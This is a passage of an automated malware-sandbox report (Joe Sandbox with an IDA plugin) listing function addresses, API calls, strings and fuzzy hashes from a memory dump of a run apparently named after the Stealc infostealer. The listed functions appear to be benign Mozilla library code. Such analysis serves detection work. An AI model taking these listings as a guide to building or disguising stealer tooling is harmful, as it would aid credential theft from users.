name, xrefs: 6C121939

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: b76fe7b6319bd9511e06b37dc8ecdbf13fea3ac7822ff20900e6e7546864c4e1
Instruction ID: ecd853a6a8242ed04c3c23cfc8d48d0691d926d6735c1c55d9339c80f8fe7870
Opcode Fuzzy Hash: b76fe7b6319bd9511e06b37dc8ecdbf13fea3ac7822ff20900e6e7546864c4e1
Instruction Fuzzy Hash: 4471E3B1A003069FDB04DF28D4547AABBB1FF45304F108669D8254BB41D775FAA8CBE2

Function 6C12B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010,00000000,?,?,6C12AB1F), ref: 6C12B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010,00000000,?), ref: 6C12B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010), ref: 6C12B25F

Strings

map/set<T> too long, xrefs: 6C12B1FA

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: d39faab5a236d0a79827d48afb7140e9fef06ed9e1ad2e6ab9b35baecbd4004d
Instruction ID: d5511f60b888ef2eac0d42187cb01d8ab81f9c5c72dc3e85a40ff547ad88aae1
Opcode Fuzzy Hash: d39faab5a236d0a79827d48afb7140e9fef06ed9e1ad2e6ab9b35baecbd4004d
Instruction Fuzzy Hash: 57618B786042458FD701CF19D880A9ABBF1FF5A318F18C5A9D85A4BB52C339FC85CBA1

Function 6C0ED468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

EnterCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED4F2
LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED50B

Part of subcall function 6C0CCFE0: EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
Part of subcall function 6C0CCFE0: LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED52E
EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED690
LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C0FD1C5), ref: 6C0ED751

Strings

MOZ_CRASH(), xrefs: 6C0ED4BB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: e8d8856c8670784b0e633a78f4a044fc6ee1268df15b3edef348e61e64d32cbf
Instruction ID: 5ea8c6e06616f42c7ae77462aa509ca8ec555798234df52b08f1a3c8f08a4f16
Opcode Fuzzy Hash: e8d8856c8670784b0e633a78f4a044fc6ee1268df15b3edef348e61e64d32cbf
Instruction Fuzzy Hash: 8F51F271A047018FD328CF28C09475AB7E5EFC9718F54892EDAA9C7B84E770E840CB91

Function 6C114630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C114721

Strings

profiler-paused, xrefs: 6C1146E4
-%llu, xrefs: 6C114733
., xrefs: 6C11476A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: a0edb8b6f636f0de5863a16855bac28f179bc04053b1bd45e31349b0321974e6
Instruction ID: 3e67147d6a73b1adfb3222886f5699a57da412090ce70dc6af3c7224f87c9281
Opcode Fuzzy Hash: a0edb8b6f636f0de5863a16855bac28f179bc04053b1bd45e31349b0321974e6
Instruction Fuzzy Hash: 7C414671E086089BCB08DF78D85119EBBE5EF85B4CF10863DE859ABB81EB349845C751

Function 6C139830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C13985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C13987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C1398DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C1398D9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: d386226134a32728742752cc467b256cff9d38dc1403fb4d4843273d8e1bb9f8
Instruction ID: 2f269df8c9c821daf7cac0b9325325a68b7a1547e1dc9b9df484b96235abd98d
Opcode Fuzzy Hash: d386226134a32728742752cc467b256cff9d38dc1403fb4d4843273d8e1bb9f8
Instruction Fuzzy Hash: 4E313571B0010C6FDB14AF58D854AEF77E8DF84318F10842DEE2AABB40CB31A9158BE1

Function 6C1146E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C114721

Part of subcall function 6C0C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C103EBD,00000017,?,00000000,?,6C103EBD,?,?,6C0C42D2), ref: 6C0C4444

Strings

profiler-paused, xrefs: 6C1146E4
-%llu, xrefs: 6C114733
., xrefs: 6C11476A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: a8b831fdc376f066eb541726e1a0a0e66882ad58a2bc733a36371f0641375d51
Instruction ID: bf0682062026c158e37f34b4a18a33eb8d000b1dfb673adefa7707c9017bda4e
Opcode Fuzzy Hash: a8b831fdc376f066eb541726e1a0a0e66882ad58a2bc733a36371f0641375d51
Instruction Fuzzy Hash: DC317C71F042084BCB0CCF6CD89129EBBE6DB88718F15853DE8159BB40EB74D8448B50

Function 6C11B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C11B127), ref: 6C11B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C11B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C11B4E4

Strings

pid:, xrefs: 6C11B4DE

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 04e61468ba15e1e96c321719be839cc696a0533fdc6e02e80e976b21bdb336a2
Instruction ID: f68232021e11f8fbd1f690c336946e0d644ea65fc3fd532aaf3741e24851ce70
Opcode Fuzzy Hash: 04e61468ba15e1e96c321719be839cc696a0533fdc6e02e80e976b21bdb336a2
Instruction Fuzzy Hash: 1F3122B1A05208CBCB00DFAAD880AAEB7B5BF04308F54453DD802A7F41D735E849CBA1

Function 6C0CF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132

Strings

SHGetKnownFolderPath, xrefs: 6C0CF12C
shell32, xrefs: 6C0CF11D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: b7de78cd7ec52db3a4cbea1e9da0c1011102491a7628901b9fa2a6cbb1ac9885
Instruction ID: f074c6d228a9019ac394e572f2a17cf5505ee5a4328d5969873ad33ce6f7c13f
Opcode Fuzzy Hash: b7de78cd7ec52db3a4cbea1e9da0c1011102491a7628901b9fa2a6cbb1ac9885
Instruction Fuzzy Hash: C6014C717012159BCB00EF6AD848A5F7BF8EF4A658B504419E859E7300D730AA04CBA1

Function 6C10E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C10E577
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E584
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C10E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C10E5A1, 6C10E5CC, 6C10E5FF, 6C10E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C10E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C10E722, 6C10E750, 6C10E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C10E777
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C10E826, 6C10E850

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: a1dd0d4277c5c7b346499cbe5041eb5d783571b46516eb381e9ee27dd6c2701e
Instruction ID: cb88c52848aaa894cf7a74db96a9019cb9596b71e1d2ccc3d537aa08f4ea3fc9
Opcode Fuzzy Hash: a1dd0d4277c5c7b346499cbe5041eb5d783571b46516eb381e9ee27dd6c2701e
Instruction Fuzzy Hash: 1F11AD31B04658DFCB00AF15C848B6ABBB4FF8932CF488619E8A557B90DB70A905DBD5

Function 6C0D2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0D237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0D2B9C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f5a05e784aa66924aa1b8db184dd906ae72f09cf5a875e89f5ace917a885a75b
Instruction ID: 28b639e1db5ff9583530ee31bce0aeb8c0fd8fe0f77f335e60b14b3562d934a4
Opcode Fuzzy Hash: f5a05e784aa66924aa1b8db184dd906ae72f09cf5a875e89f5ace917a885a75b
Instruction Fuzzy Hash: 7BE13871A003069FDB18CF59C894B9EBBF2BF88314F1A8169E9099B745D771EC85CB90

Function 6C110C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C110CD5

Part of subcall function 6C0FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0FF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C110D40
free.MOZGLUE ref: 6C110DCB

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

free.MOZGLUE ref: 6C110DDD
free.MOZGLUE ref: 6C110DF2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 9a5b34a38e22a2d32fb055c713968e805a04d1b57f08ccac6d2b1e4bbdb020c3
Instruction ID: fb577f5155006b74912cc803e752f49a2efc72926a293f27caccae2ae78782c1
Opcode Fuzzy Hash: 9a5b34a38e22a2d32fb055c713968e805a04d1b57f08ccac6d2b1e4bbdb020c3
Instruction Fuzzy Hash: D941477591C7908BD720CF29C08039AFBE5BFC8714F118A2EE8D887B10DB74A494CB82

Function 6C119120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C118242,?,00000000,?,6C10B63F), ref: 6C1191BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C118242,?,00000000,?,6C10B63F), ref: 6C1191EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C118242,?,00000000,?,6C10B63F), ref: 6C119219

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: dcda02ac784397b7127e4dd0645e195b07dd4aafa1be48b92d7df7f0a80d0dd8
Instruction ID: 3fac11cbbc594d4acfb0f7998f656883ba777cf46f064a830c88da608b1b12ee
Opcode Fuzzy Hash: dcda02ac784397b7127e4dd0645e195b07dd4aafa1be48b92d7df7f0a80d0dd8
Instruction Fuzzy Hash: EA319731A086058FEB00DF6CCC5436A73E5EF91325F118639D866C7A40EB39E948CBA1

Function 6C100800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C100838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C10084C
EnterCriticalSection.KERNEL32(?), ref: 6C1008AF
LeaveCriticalSection.KERNEL32(?), ref: 6C1008BD
LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C1008D5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: a7f401fab6aea1940a9cd45a0c3aba74a682e694e93e9e905fd053298ce1d6d4
Instruction ID: 024c6f24b6b017ee3731475d4aeff0190a5af82ecd48bb6ed2e26b79f9a16f1e
Opcode Fuzzy Hash: a7f401fab6aea1940a9cd45a0c3aba74a682e694e93e9e905fd053298ce1d6d4
Instruction Fuzzy Hash: 0E210431B052098BEF04EF65D848FAEB7B9BF8570DF504529D909A7B00DF32A9148BD0

Function 6C11CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CDA4

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

Part of subcall function 6C11D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C11CDBA,00100000,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D158
Part of subcall function 6C11D130: InitializeConditionVariable.KERNEL32(00000098,?,6C11CDBA,00100000,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CDC4

Part of subcall function 6C117480: ReleaseSRWLockExclusive.KERNEL32(?,6C1215FC,?,?,?,?,6C1215FC,?), ref: 6C1174EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11CECC

Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2

Part of subcall function 6C10CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C11CEEA,?,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000), ref: 6C10CB57
Part of subcall function 6C10CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C10CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C11CEEA,?,?), ref: 6C10CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?,00000000,?), ref: 6C11D058

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 963a2c225c72aa1ce7592dca935689a11bf845418c2797963ee4b4cab7a5d49c
Instruction ID: b3bf35404e8b4715ca2e8393169a91afcf28d7fb25b9fc5889a9dd58d8914f51
Opcode Fuzzy Hash: 963a2c225c72aa1ce7592dca935689a11bf845418c2797963ee4b4cab7a5d49c
Instruction Fuzzy Hash: 9BD18F71A08B469FC708DF28C490B99F7E1BF99308F01866DD9598BB11EB31F965CB81

Function 6C0D1720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0D17B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C0D18EE
free.MOZGLUE(?), ref: 6C0D1911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0D194C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: d5faa02f93ade854c7256a971045a631cd779c3e9c4d472f3c5c2d9d90cec7d3
Instruction ID: 96959da536aec276d631e512f79ce1f1a0ef073b7dbb06fdd2c5141cb3052bed
Opcode Fuzzy Hash: d5faa02f93ade854c7256a971045a631cd779c3e9c4d472f3c5c2d9d90cec7d3
Instruction Fuzzy Hash: D581B370A153159FDB08CF68D894AAEBBF1FF89324F05452CE815AB750DB30E945CBA1

Function 6C0E5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C0E5D40
EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67
__aulldiv.LIBCMT ref: 6C0E5DB4
LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: ae95163b01fa134e0ae61f0f4aa05ab2dc76efdb2ded4407ff9b7b7c9482de59
Instruction ID: 9b7fa298747ec08c1b8a26423e2eecfe9fd827b25e3bbf70bff5fda7d5446551
Opcode Fuzzy Hash: ae95163b01fa134e0ae61f0f4aa05ab2dc76efdb2ded4407ff9b7b7c9482de59
